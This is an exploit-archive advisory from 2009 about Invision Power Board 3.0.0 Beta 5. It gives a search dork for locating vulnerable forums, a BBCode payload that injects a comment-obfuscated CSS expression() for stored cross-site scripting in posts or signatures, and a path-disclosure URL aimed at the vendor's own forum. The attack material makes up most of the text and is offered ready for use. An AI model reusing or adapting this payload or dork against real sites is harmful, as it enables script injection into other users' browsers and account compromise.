[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Invision Power Board 3.0.0b5 Active XSS & Path Disclosure Vulns
# Published : 2009-04-27
# Author : brain[pillow]
# Previous Title : Tiny Blogr 1.0.0 rc4 (Auth Bypass) SQL Injection Vulnerability
# Next Title : Opencart 1.1.8 (route) Local File Inclusion Vulnerability
================================================================================
Found : brain[pillow]
Dork : "Powered By IP.Board 3.0.0 Beta 5"
Visit : brainpillow.cc, forum.antichat.ru, raz0r.name
Greetz: slider, halkfild, m0nzt3r, c411k, ettee
Mail : brainpillow@gmail.com
Note: works on IE 6,7,8. maybe all betas are vulnerable and it is possible to tune the xss for FF 2.0 too ;)
================================================================================
Active XSS in message body or signature:
[email]qwe@[twitter]dodo style=`top:expr/*
*/ession/*bypassed*/(alert(/yahoo/))`do[/twitter]qwe.com[/email]
================================================================================
Path disclosure:
http://forums.invisionpower.com/index.php?app=core&module=ajax§ion=register&do=check-display-name&name[]=
================================================================================
# www.Syue.com [2009-04-27]